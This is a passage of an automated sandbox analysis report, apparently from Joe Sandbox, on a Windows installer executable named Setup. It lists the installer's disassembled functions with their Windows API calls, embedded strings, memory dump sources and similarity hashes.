                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                  • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                  • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                  • API String ID: 3734993849-3206598305
                                                                  • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                  • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                  • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                  • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                  Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                  • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                  Strings
                                                                  • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                  • String ID: created uninstaller: %d, "%s"
                                                                  • API String ID: 3294113728-3145124454
                                                                  • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                  • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                  • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                  • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                  Function 004023F0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 83libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,759223A0,00000000), ref: 00404FD6
                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FE6
                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FF9
                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                  • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                  Strings
                                                                  • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                  • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                  • `G, xrefs: 0040246E
                                                                  • 8bd, xrefs: 00402473
                                                                  • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                  • String ID: 8bd$Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                  • API String ID: 1033533793-2017676009
                                                                  • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                  • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                  • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                  • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                  Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                  • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                  • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                  • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                  • GetSysColor.USER32(?), ref: 00403E57
                                                                  • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                  • DeleteObject.GDI32(?), ref: 00403E81
                                                                  • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                  • String ID:
                                                                  • API String ID: 2320649405-0
                                                                  • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                  • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                  • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                  • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                  Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,759223A0,00000000), ref: 00404FD6
                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FE6
                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FF9
                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                    • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                    • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                  Strings
                                                                  • Exec: command="%s", xrefs: 00402241
                                                                  • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                  • Exec: success ("%s"), xrefs: 00402263
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                  • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                  • API String ID: 2014279497-3433828417
                                                                  • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                  • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                  • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                  • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                  Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                  • GetMessagePos.USER32 ref: 0040489D
                                                                  • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$ClientScreen
                                                                  • String ID: f
                                                                  • API String ID: 41195575-1993550816
                                                                  • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                  • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                  • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                  • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                  Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                  • MulDiv.KERNEL32(00065600,00000064,046024A0), ref: 00403295
                                                                  • wsprintfW.USER32 ref: 004032A5
                                                                  • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                  Strings
                                                                  • verifying installer: %d%%, xrefs: 0040329F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                  • String ID: verifying installer: %d%%
                                                                  • API String ID: 1451636040-82062127
                                                                  • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                  • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                  • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                  • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                  Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                  • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                  • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Char$Next$Prev
                                                                  • String ID: *?|<>/":
                                                                  • API String ID: 589700163-165019052
                                                                  • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                  • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                  • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                  • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                  Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Close$DeleteEnumOpen
                                                                  • String ID:
                                                                  • API String ID: 1912718029-0
                                                                  • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                  • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                  • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                  • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                  Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?), ref: 004020A3
                                                                  • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                  • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                  • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                  • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                  • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                  Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Timeout
                                                                  • String ID: !
                                                                  • API String ID: 1777923405-2657877971
                                                                  • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                  • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                  • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                  • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                  Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                  • wsprintfW.USER32 ref: 00404483
                                                                  • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
